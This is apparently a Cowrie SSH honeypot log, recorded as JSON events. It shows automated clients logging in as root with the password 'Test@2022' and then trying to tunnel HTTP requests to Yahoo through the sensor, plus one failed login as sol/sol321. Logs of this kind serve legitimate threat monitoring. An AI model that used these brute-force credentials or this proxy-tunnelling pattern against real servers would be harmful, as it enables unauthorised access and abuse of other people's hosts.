{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:17.684738Z","src_ip":"213.209.150.239","session":"4f2dd7ea0fc9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:17.731853Z","src_ip":"213.209.150.239","session":"4f2dd7ea0fc9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:17.967839Z","src_ip":"213.209.150.239","session":"4f2dd7ea0fc9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":8019,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:8019","sensor":"my-vps","timestamp":"2025-08-26T01:08:18.016048Z","session":"4f2dd7ea0fc9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:18.063500Z","src_ip":"213.209.150.239","session":"4f2dd7ea0fc9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":16359,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:16359","sensor":"my-vps","timestamp":"2025-08-26T01:08:18.201667Z","session":"4f2dd7ea0fc9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:18.249207Z","src_ip":"213.209.150.239","session":"4f2dd7ea0fc9"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:18.298793Z","src_ip":"213.209.150.239","session":"4f2dd7ea0fc9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52495,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c48807a35fd","protocol":"ssh","message":"New connection: 213.209.150.239:52495 (1.2.3.4:22) [session: 8c48807a35fd]","sensor":"my-vps","timestamp":"2025-08-26T01:08:18.354457Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:18.355656Z","src_ip":"213.209.150.239","session":"8c48807a35fd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:18.412766Z","src_ip":"213.209.150.239","session":"8c48807a35fd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:18.695905Z","src_ip":"213.209.150.239","session":"8c48807a35fd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":30914,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:30914","sensor":"my-vps","timestamp":"2025-08-26T01:08:18.753599Z","session":"8c48807a35fd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:18.810374Z","src_ip":"213.209.150.239","session":"8c48807a35fd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":5594,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:5594","sensor":"my-vps","timestamp":"2025-08-26T01:08:18.967023Z","session":"8c48807a35fd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:19.023822Z","src_ip":"213.209.150.239","session":"8c48807a35fd"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:19.081355Z","src_ip":"213.209.150.239","session":"8c48807a35fd"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52567,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd84ffc45468","protocol":"ssh","message":"New connection: 213.209.150.239:52567 (1.2.3.4:22) [session: dd84ffc45468]","sensor":"my-vps","timestamp":"2025-08-26T01:08:19.127376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:19.137126Z","src_ip":"213.209.150.239","session":"dd84ffc45468"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:19.174612Z","src_ip":"213.209.150.239","session":"dd84ffc45468"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:19.409717Z","src_ip":"213.209.150.239","session":"dd84ffc45468"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":29901,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:29901","sensor":"my-vps","timestamp":"2025-08-26T01:08:19.458844Z","session":"dd84ffc45468"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:19.506078Z","src_ip":"213.209.150.239","session":"dd84ffc45468"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":16820,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:16820","sensor":"my-vps","timestamp":"2025-08-26T01:08:19.649778Z","session":"dd84ffc45468"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:19.696969Z","src_ip":"213.209.150.239","session":"dd84ffc45468"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:19.744675Z","src_ip":"213.209.150.239","session":"dd84ffc45468"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52626,"dst_ip":"1.2.3.4","dst_port":22,"session":"268659c5080b","protocol":"ssh","message":"New connection: 213.209.150.239:52626 (1.2.3.4:22) [session: 268659c5080b]","sensor":"my-vps","timestamp":"2025-08-26T01:08:19.790993Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:19.791886Z","src_ip":"213.209.150.239","session":"268659c5080b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:19.839065Z","src_ip":"213.209.150.239","session":"268659c5080b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:20.074266Z","src_ip":"213.209.150.239","session":"268659c5080b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":6062,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:6062","sensor":"my-vps","timestamp":"2025-08-26T01:08:20.122207Z","session":"268659c5080b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:20.169605Z","src_ip":"213.209.150.239","session":"268659c5080b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":2716,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:2716","sensor":"my-vps","timestamp":"2025-08-26T01:08:20.305672Z","session":"268659c5080b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:20.352860Z","src_ip":"213.209.150.239","session":"268659c5080b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53296,"dst_ip":"1.2.3.4","dst_port":22,"session":"eeb1433d5b7f","protocol":"ssh","message":"New connection: 212.227.125.160:53296 (1.2.3.4:22) [session: eeb1433d5b7f]","sensor":"my-vps","timestamp":"2025-08-26T01:08:20.392874Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:08:20.393735Z","src_ip":"212.227.125.160","session":"eeb1433d5b7f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:20.400481Z","src_ip":"213.209.150.239","session":"268659c5080b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52681,"dst_ip":"1.2.3.4","dst_port":22,"session":"58e4ffa29055","protocol":"ssh","message":"New connection: 213.209.150.239:52681 (1.2.3.4:22) [session: 58e4ffa29055]","sensor":"my-vps","timestamp":"2025-08-26T01:08:20.446823Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:20.447752Z","src_ip":"213.209.150.239","session":"58e4ffa29055"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:08:20.455110Z","src_ip":"212.227.125.160","session":"eeb1433d5b7f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:20.494781Z","src_ip":"213.209.150.239","session":"58e4ffa29055"}
{"eventid":"cowrie.login.failed","username":"sol","password":"sol321","message":"login attempt [sol/sol321] failed","sensor":"my-vps","timestamp":"2025-08-26T01:08:20.691585Z","src_ip":"212.227.125.160","session":"eeb1433d5b7f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:20.729055Z","src_ip":"213.209.150.239","session":"58e4ffa29055"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":3046,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:3046","sensor":"my-vps","timestamp":"2025-08-26T01:08:20.777332Z","session":"58e4ffa29055"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:20.824435Z","src_ip":"213.209.150.239","session":"58e4ffa29055"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":27203,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:27203","sensor":"my-vps","timestamp":"2025-08-26T01:08:20.961568Z","session":"58e4ffa29055"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:21.008689Z","src_ip":"213.209.150.239","session":"58e4ffa29055"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:21.056568Z","src_ip":"213.209.150.239","session":"58e4ffa29055"}
